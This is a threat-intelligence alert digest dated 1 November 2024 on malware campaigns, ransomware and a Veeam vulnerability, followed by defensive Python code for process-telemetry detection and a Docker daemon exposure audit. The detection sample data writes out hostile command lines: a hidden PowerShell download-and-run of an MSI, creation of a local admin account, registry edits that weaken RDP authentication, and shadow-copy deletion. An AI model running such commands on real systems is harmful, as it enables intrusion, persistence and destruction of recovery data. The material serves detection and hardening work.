DATE | NAME | CATEGORY | SUBCATEGORY | INFO |
1.11.24 | New variant of FakeCall Android malware | ALERTS | VIRUS | A new variant of the Android malware called FakeCall has been observed in the wild. The attackers behind this malware use voice phishing (vishing) to trick victims into disclosing sensitive information such as credentials or banking details. By abusing the Android Accessibility Service, FakeCall gives the attackers considerable remote control over infected devices: it can simulate user actions, intercept incoming and outgoing calls, and manipulate the device camera. FakeCall also collects contacts, call logs and SMS messages from compromised devices and forwards them to attacker-controlled C2 servers. |
1.11.24 | Sauron - a new ransomware variant in the wild | ALERTS | RANSOM | Sauron is a new ransomware variant recently found in the wild. The malware appends the ".sauron" extension to encrypted files and drops a ransom note named "#HowToRecover.txt" on affected machines. The note instructs victims to contact the attackers at the provided email address and demands payment in Bitcoin. The malware also changes the desktop wallpaper to inform victims that their files have been encrypted. Sauron deletes Volume Shadow Copies on infected machines to prevent victims from recovering their data from local snapshots. |
1.11.24 | UNC5812 campaigns against Ukraine with Android and Windows malware | ALERTS | GROUP | A recent report highlighted activity attributed to a suspected Russian threat actor tracked as UNC5812. The activity involved the distribution of Android and Windows malware targeting Ukrainian military recruits. The campaign aimed not only at espionage but also at undermining support for pro-Ukrainian forces. |
1.11.24 | A possible Bumblebee Loader resurgence | ALERTS | VIRUS | A new campaign delivering the Bumblebee loader has been reported this month. Bumblebee is a sophisticated downloader first discovered in 2022. It has been spread in numerous malicious campaigns and used to deliver and execute a variety of payloads, including Cobalt Strike and ransomware. Since Operation Endgame, the botnet disruption coordinated by Europol in May 2024, Bumblebee had not been observed until now. The new infection chain uses malicious .zip archives, PowerShell commands, .lnk and .msi files, ending with payloads deployed as .dll binaries. |
1.11.24 | CVE-2024-40711 - Veeam Backup and Replication deserialization vulnerability exploited by ransomware actors | ALERTS | VULNERABILITY | CVE-2024-40711 is a recently disclosed critical (CVSS score 9.8) deserialization vulnerability affecting Veeam Backup and Replication versions 12.1.2.172 and older. If successfully exploited, the flaw can give unauthenticated attackers remote code execution (RCE) on vulnerable systems. The vulnerability has been reported as exploited in the wild by the Akira and Fog ransomware groups. Following those reports, CVE-2024-40711 was added to CISA's Known Exploited Vulnerabilities (KEV) catalog. |
1.11.24 | Malicious "Lounge Pass" app targets air travelers in India | ALERTS | VIRUS | A campaign involving a malicious Android app called "Lounge Pass" targeting air travelers at Indian airports has been observed. Distributed through fake domains, the app intercepts SMS messages on victims' devices and forwards them to the criminals, which has led to significant financial losses. The scammers used an exposed Firebase endpoint to store the stolen SMS messages. To prevent this kind of data theft, download apps only from official stores and do not grant SMS access to travel or lounge apps. |
1.11.24 | Adware Campaign uses Fake CAPTCHA to deliver Lumma and Amadey malware | ALERTS | VIRUS | Threat actors are increasingly using fake CAPTCHAs as an initial attack vector. A recent adware campaign targets online users with fake CAPTCHA or update prompts. The attackers use ad networks to redirect victims to compromised sites hosting these social engineering lures. Victims who follow the prompts end up running PowerShell commands that deploy credential-stealing malware: Lumma, which harvests cryptocurrency wallets, passwords and browser data, or Amadey, which gathers credentials and can deploy the Remcos RAT. |
1.11.24 | TeamTNT targets cloud-native environments in new Cryptojacking campaign | ALERTS | CRYPTOCURRENCY | A new campaign by the cryptojacking group TeamTNT has been reported targeting cloud-native environments for cryptocurrency mining and for reselling compromised servers. The group gains access through exposed Docker daemon ports, deploys the Sliver implant, worm components and cryptominers, and uses compromised Docker Hub accounts to spread its malware and rent out the victims' computing power. |
1.11.24 | Rekoobe malware found potentially targeting TradingView users | ALERTS | VIRUS | An open directory has been discovered hosting Rekoobe malware, potentially aimed at TradingView users and connected to other cyber espionage campaigns. Rekoobe is a versatile backdoor previously deployed by APT31 and other adversaries engaged in cyber espionage and data theft. Partially based on the publicly available Tiny SHell, the malware has evolved to incorporate stronger encryption and unique command-and-control configurations, making analysis and detection more difficult. |
1.11.24 | Daggerfly targets Taiwanese entities with new CloudScout Toolset | ALERTS | APT | China-linked threat actor Daggerfly (also known as Evasive Panda) has been reported targeting a government entity and a religious organization in Taiwan with a previously undocumented post-compromise toolset called CloudScout. This toolset can retrieve data from various cloud services by leveraging stolen web session cookies. Additionally, CloudScout integrates seamlessly with MgBot, Evasive Panda's signature malware framework. |
1.11.24 | Phishing Campaign Distributing XWorm RAT | ALERTS | PHISHING | Researchers have recently uncovered a malicious campaign spreading the XWorm RAT via fake emails posing as official communications from Namirial, a software and services company. The emails prompt users to open a password-protected PDF and, if that fails, direct them to a Dropbox link that downloads a ZIP file. The archive contains a URL file that connects to the attackers' servers and downloads additional malicious scripts, giving them control over the victim's machine. |
1.11.24 | HeptaX Cyberattack Operations | ALERTS | OPERATION | A researcher recently identified a multi-stage cyberattack targeting the healthcare industry, initiated through a ZIP file containing a malicious shortcut (.lnk) file, likely spread via phishing emails. When executed, the LNK file runs a PowerShell command that downloads additional payloads, including scripts and BAT files, from a remote server. These scripts create a new administrative user account and alter RDP settings to reduce authentication requirements, allowing the attackers to gain remote access for further malicious actions such as data theft and malware installation. |
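Several of the entries above describe behaviours that show up in endpoint process-creation telemetry: the Sauron entry's Volume Shadow Copy deletion, the Bumblebee chain of PowerShell commands leading to an .msi payload, and the HeptaX scripts that add an administrative account and weaken RDP authentication. The detection logic below is an added example written for this page; it is not code from any of the cited reports. It runs a small rule set over constructed Sysmon Event ID 1-style records (the field names, pids and command lines are invented for the example) and walks the parent chain so that an msiexec.exe launched under a PowerShell that fetched a file is flagged as a chain rather than as two unrelated processes.

```python
import re

# Constructed Sysmon Event ID 1-style records (hypothetical JSON export, not
# telemetry from any of the reports above). pid/ppid link each child to its parent.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    # Bumblebee-style chain: an LNK from a ZIP starts PowerShell, which fetches and runs an MSI
    {"pid": 201, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -w hidden -ep bypass -c "iwr http://198.51.100.7/inst.msi -o $env:TEMP\inst.msi; msiexec /i $env:TEMP\inst.msi /qn"'},
    {"pid": 202, "ppid": 201, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec /i C:\Users\u\AppData\Local\Temp\inst.msi /qn"},
    # HeptaX-style batch script: new local admin and weakened RDP settings
    {"pid": 301, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c C:\Users\u\Downloads\setup.bat"},
    {"pid": 302, "ppid": 301, "image": r"C:\Windows\System32\net.exe",
     "cmdline": "net user support P@ss123 /add"},
    {"pid": 303, "ppid": 301, "image": r"C:\Windows\System32\net.exe",
     "cmdline": "net localgroup administrators support /add"},
    {"pid": 304, "ppid": 301, "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f'},
    {"pid": 305, "ppid": 301, "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'},
    # Sauron-style ransomware: shadow copies removed before encryption
    {"pid": 401, "ppid": 100, "image": r"C:\Users\u\Downloads\update.exe", "cmdline": "update.exe"},
    {"pid": 402, "ppid": 401, "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    # Benign activity that must not fire
    {"pid": 501, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Process"},
    {"pid": 502, "ppid": 100, "image": r"C:\Windows\System32\net.exe",
     "cmdline": r"net use Z: \\fs01\share"},
]

# Cmdlets and classes that indicate PowerShell pulled something from the network.
DOWNLOAD_CUE = r"(?:iwr|invoke-webrequest|downloadstring|downloadfile|net\.webclient|start-bitstransfer)"

# (rule name, image basenames the rule applies to, regex evaluated over the command line).
# Rule names are this example's own, not identifiers from the reports.
RULES = [
    ("hidden_powershell_download", {"powershell.exe", "pwsh.exe"},
     re.compile(r"(?=.*-w(?:indowstyle)?\s+hidden)(?=.*" + DOWNLOAD_CUE + ")", re.I | re.S)),
    ("local_user_created", {"net.exe", "net1.exe"},
     re.compile(r"\buser\s+\S+(?:\s+\S+)?\s+/add\b", re.I)),
    ("local_admin_added", {"net.exe", "net1.exe"},
     re.compile(r"\blocalgroup\s+administrators\s+\S+\s+/add\b", re.I)),
    # NLA switched off (UserAuthentication=0) or RDP enabled (fDenyTSConnections=0) via reg.exe
    ("rdp_auth_weakened", {"reg.exe"},
     re.compile(r"terminal server.*(?:userauthentication|fdenytsconnections).*/d\s+0\b", re.I)),
    ("shadow_copy_deletion", {"vssadmin.exe", "wmic.exe", "powershell.exe"},
     re.compile(r"delete\s+shadows|shadowcopy\s+delete|win32_shadowcopy", re.I)),
]


def basename(path):
    """Lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestors(by_pid, pid, max_depth=8):
    """Return parent, grandparent, ... of pid, bounded so pid reuse cannot loop forever."""
    chain, ev = [], by_pid.get(pid)
    while ev is not None and len(chain) < max_depth:
        ev = by_pid.get(ev["ppid"])
        if ev is not None:
            chain.append(ev)
    return chain


def detect(events):
    """Evaluate every rule over every event; returns (rule name, pid) tuples in event order."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        img, cmd = basename(e["image"]), e["cmdline"]
        for name, images, pattern in RULES:
            if img in images and pattern.search(cmd):
                findings.append((name, e["pid"]))
        # Chain rule: msiexec whose ancestry includes a PowerShell that downloaded something
        if img == "msiexec.exe":
            for anc in ancestors(by_pid, e["pid"]):
                if basename(anc["image"]) in ("powershell.exe", "pwsh.exe") and re.search(DOWNLOAD_CUE, anc["cmdline"], re.I):
                    findings.append(("msiexec_after_powershell_download", e["pid"]))
                    break
    return findings


if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule:35} pid={pid}")
```

Run it directly to print the seven findings from the sample timeline. Two tuning points matter in production: the UserAuthentication/fDenyTSConnections rule also fires on legitimate administration, so it should be correlated with account-creation events under the same parent process, which is the pairing the HeptaX entry describes; and a real Sysmon or EDR export carries the parent image in the event itself, which removes the need to reconstruct ancestry from pids.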
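The TeamTNT entry above turns on exposed Docker daemons. The check below is an added example for this page, not tooling from the report: it audits a daemon.json for TCP listeners that lack client-certificate authentication, and includes a plain-HTTP probe of the remote API's GET /version endpoint (a network call, for use only against hosts you are authorised to test). The daemon.json contents, addresses and certificate paths are constructed for the example.

```python
import http.client
import json
from urllib.parse import urlparse

# Constructed daemon.json contents (hypothetical; not taken from any report).
WEAK_DAEMON_JSON = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]
}"""

HARDENED_DAEMON_JSON = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}"""

TLS_KEYS = ("tlscacert", "tlscert", "tlskey")


def audit_daemon_json(text):
    """Return one finding per problem with every TCP listener in a daemon.json document."""
    cfg = json.loads(text)
    findings = []
    for host in cfg.get("hosts", []):
        u = urlparse(host)
        if u.scheme != "tcp":
            continue  # unix:// and fd:// sockets are local-only
        if u.hostname in (None, "", "0.0.0.0", "::"):
            findings.append(f"{host}: bound to all interfaces")
        if not cfg.get("tlsverify"):
            findings.append(f"{host}: no tlsverify, remote API accepts unauthenticated clients")
        else:
            missing = [k for k in TLS_KEYS if not cfg.get(k)]
            if missing:
                findings.append(f"{host}: tlsverify set but missing {', '.join(missing)}")
        if u.port == 2375:
            findings.append(f"{host}: 2375 is the conventional plaintext port; TLS listeners use 2376")
    return findings


def probe_docker_api(host, port=2375, timeout=3.0):
    """GET /version over plain HTTP; returns the engine version string if the daemon
    answers without authentication, else None. This makes a network connection."""
    try:
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
        conn.request("GET", "/version")
        resp = conn.getresponse()
        body = resp.read()
        conn.close()
    except (OSError, http.client.HTTPException):
        return None
    if resp.status != 200:
        return None
    try:
        return json.loads(body).get("Version")
    except ValueError:
        return None


if __name__ == "__main__":
    for label, doc in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(label, audit_daemon_json(doc) or "no findings")
```

A daemon listening on tcp://0.0.0.0:2375 without tlsverify hands full control of the host to anyone who can reach the port, which is what lets a cryptojacking worm start privileged containers on it. The hardened configuration binds a specific address on 2376 with tlsverify and all three certificate files set. Note that dockerd also accepts -H and --tls* flags on its command line (for example in a systemd unit), which this check does not read, so audit the unit file alongside daemon.json.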